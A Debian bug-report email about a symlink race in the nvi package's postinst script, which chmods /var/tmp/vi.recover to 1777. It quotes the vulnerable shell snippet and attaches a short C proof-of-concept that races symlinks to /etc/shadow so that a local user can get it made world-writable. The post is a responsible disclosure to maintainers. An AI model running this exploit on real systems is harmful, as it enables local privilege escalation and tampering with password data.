Bug#771375: nvi: insecure use of /var/tmp

To: 771375@bugs.debian.org
Subject: Bug#771375: nvi: insecure use of /var/tmp
From: Jakub Wilk <jwilk@debian.org>
Date: Sat, 6 Dec 2014 15:45:37 +0100
Message-id: <[🔎] 20141206144537.GA8391@jwilk.net>
Reply-to: Jakub Wilk <jwilk@debian.org>, 771375@bugs.debian.org
In-reply-to: <20141128221907.GA8466@jwilk.net>
References: <20141128221907.GA8466@jwilk.net>

* Jakub Wilk <jwilk@debian.org>, 2014-11-28, 23:19:

nvi does this in postinst:

  if [[ -L /var/tmp/vi.recover || \
	  -e /var/tmp/vi.recover && ! -d /var/tmp/vi.recover ]]; then
    echo "Cannot create recovery directory /var/tmp/vi.recover" 1>&2
    exit 1
  fi
  [ -d /var/tmp/vi.recover ] || mkdir -p /var/tmp/vi.recover
  chown root:root /var/tmp/vi.recover
  chmod 1777 /var/tmp/vi.recover

This is racy.

If there is no symlink protection enabled(/proc/sys/fs/protected_symlinks), malicious local user could trickthis code into chmodding arbitrary files.

PoC exploit is attached. On a test machine I was able to get /etc/shadowpwned with probability ~0.1%.


--
Jakub Wilk

#include <sys/stat.h>
#include <unistd.h>

int main(int argc, char **argv)
{
	const char *f = "/var/tmp/vi.recover";
	while (1) {
		symlink("/etc/shadow", f);
		unlink(f);
		mkdir(f, 0777);
		rmdir(f);
	}
}

Reply to:

Prev by Date: Bug#772353: pdnsd: bashism in /bin/sh script
Next by Date: Bug#772383: ulatencyd: bashism in /bin/sh script
Previous by thread: Bug#772353: pdnsd: bashism in /bin/sh script
Next by thread: Bug#772383: ulatencyd: bashism in /bin/sh script
Index(es):
- Date
- Thread